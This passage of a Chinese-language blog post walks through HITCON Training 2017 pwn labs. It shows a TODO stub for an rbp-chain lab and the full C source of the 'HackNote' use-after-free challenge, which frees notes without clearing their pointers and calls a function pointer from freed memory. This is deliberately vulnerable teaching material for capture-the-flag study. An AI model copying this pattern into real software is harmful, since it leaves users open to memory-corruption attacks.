class="line">io.interactive()</span><br></pre></td></tr></table></figure></p>
<h1 id="Lab9"><a href="#Lab9" class="headerlink" title="Lab9"></a>Lab9</h1><p>這一題考得是 rbp chain</p>
<h2 id="TODO"><a href="#TODO" class="headerlink" title="TODO"></a>TODO</h2><h1 id="Lab10"><a href="#Lab10" class="headerlink" title="Lab10"></a>Lab10</h1><p>這一題考的是 UAF<br>也是正式踏入 heap 的領域了<br>source code:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">struct note &#123;</span><br><span class="line">	void (*printnote)();</span><br><span class="line">	char *content ;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">struct note *notelist[5];</span><br><span class="line">int count = 0;</span><br><span class="line"></span><br><span class="line">void print_note_content(struct note *this)&#123;</span><br><span class="line">	puts(this-&gt;content);</span><br><span class="line">&#125;</span><br><span class="line">void add_note()&#123;</span><br><span class="line">	int i ;</span><br><span class="line">	char buf[8];</span><br><span class="line">	int size ;</span><br><span class="line">	if(count &gt; 5)&#123;</span><br><span class="line">		puts(&quot;Full&quot;);</span><br><span class="line">		return ;</span><br><span class="line">	&#125;</span><br><span class="line">	for(i = 0 ; i &lt; 5 ; i ++)&#123;</span><br><span class="line">		if(!notelist[i])&#123;</span><br><span class="line">			notelist[i] = (struct note*)malloc(sizeof(struct note));</span><br><span class="line">			if(!notelist[i])&#123;</span><br><span class="line">				puts(&quot;Alloca Error&quot;);</span><br><span class="line">				exit(-1);</span><br><span class="line">			&#125;</span><br><span class="line">			notelist[i]-&gt;printnote = print_note_content;</span><br><span class="line">			printf(&quot;Note size :&quot;);</span><br><span class="line">			read(0,buf,8);</span><br><span class="line">			size = atoi(buf);</span><br><span class="line">			notelist[i]-&gt;content = (char *)malloc(size);</span><br><span class="line">			if(!notelist[i]-&gt;content)&#123;</span><br><span class="line">				puts(&quot;Alloca Error&quot;);</span><br><span class="line">				exit(-1);</span><br><span class="line">			&#125;</span><br><span class="line">			printf(&quot;Content :&quot;);</span><br><span class="line">			read(0,notelist[i]-&gt;content,size);</span><br><span class="line">			puts(&quot;Success !&quot;);</span><br><span class="line">			count++;</span><br><span class="line">			break;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void del_note()&#123;</span><br><span class="line">	char buf[4];</span><br><span class="line">	int idx ;</span><br><span class="line">	printf(&quot;Index :&quot;);</span><br><span class="line">	read(0,buf,4);</span><br><span class="line">	idx = atoi(buf);</span><br><span class="line">	if(idx &lt; 0 || idx &gt;= count)&#123;</span><br><span class="line">		puts(&quot;Out of bound!&quot;);</span><br><span class="line">		_exit(0);</span><br><span class="line">	&#125;</span><br><span class="line">	if(notelist[idx])&#123;</span><br><span class="line">		free(notelist[idx]-&gt;content);</span><br><span class="line">		free(notelist[idx]);</span><br><span class="line">		puts(&quot;Success&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void print_note()&#123;</span><br><span class="line">	char buf[4];</span><br><span class="line">	int idx ;</span><br><span class="line">	printf(&quot;Index :&quot;);</span><br><span class="line">	read(0,buf,4);</span><br><span class="line">	idx = atoi(buf);</span><br><span class="line">	if(idx &lt; 0 || idx &gt;= count)&#123;</span><br><span class="line">		puts(&quot;Out of bound!&quot;);</span><br><span class="line">		_exit(0);</span><br><span class="line">	&#125;</span><br><span class="line">	if(notelist[idx])&#123;</span><br><span class="line">		notelist[idx]-&gt;printnote(notelist[idx]);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void magic()&#123;</span><br><span class="line">	system(&quot;cat /home/hacknote/flag&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">void menu()&#123;</span><br><span class="line">	puts(&quot;----------------------&quot;);</span><br><span class="line">	puts(&quot;       HackNote       &quot;);</span><br><span class="line">	puts(&quot;----------------------&quot;);</span><br><span class="line">	puts(&quot; 1. Add note          &quot;);</span><br><span class="line">	puts(&quot; 2. Delete note       &quot;);</span><br><span class="line">	puts(&quot; 3. Print note        &quot;);</span><br><span class="line">	puts(&quot; 4. Exit              &quot;);</span><br><span class="line">	puts(&quot;----------------------&quot;);</span><br><span class="line">	printf(&quot;Your choice :&quot;);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">	setvbuf(stdout,0,2,0);</span><br><span class="line">	setvbuf(stdin,0,2,0);</span><br><span class="line">	char buf[4];</span><br><span class="line">	while(1)&#123;</span><br><span class="line">		menu();</span><br><span class="line">		read(0,buf,4);</span><br><span class="line">		switch(atoi(buf))&#123;</span><br><span class="line">			case 1 :</span><br><span class="line">				add_note();</span><br><span class="line">				break ;</span><br><span class="line">			case 2 :</span><br><span class="line">				del_note();</span><br><span class="line">				break ;</span><br><span class="line">			case 3 :</span><br><span class="line">				print_note();</span><br><span class="line">				break ;</span><br><span class="line">			case 4 :</span><br><span class="line">				exit(0);</span><br><span class="line">				break ;</span><br><span class="line">			default :</span><br><span class="line">				puts(&quot;Invalid choice&quot;);</span><br><span class="line">				break ;</span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>關於 heap UAF 的手法可以看我之前針對 heap 寫的<a href="https://sda06407.github.io/2019/10/30/heap-exploitation/">文章</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>AStar</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://sda06407.github.io/2019/06/22/HITCON-Training-2017/">https://sda06407.github.io/2019/06/22/HITCON-Training-2017/</a></span>
                    </p>
                
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>stay hungry stay foolish</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/write-up/"># write up</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2019/06/30/stack-pivot/">Stack Pivot</a>
            
            
            <a class="next" rel="next" href="/2019/05/07/INSHACK-ctf-2019/">INSHACK_ctf_2019</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© AStar | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>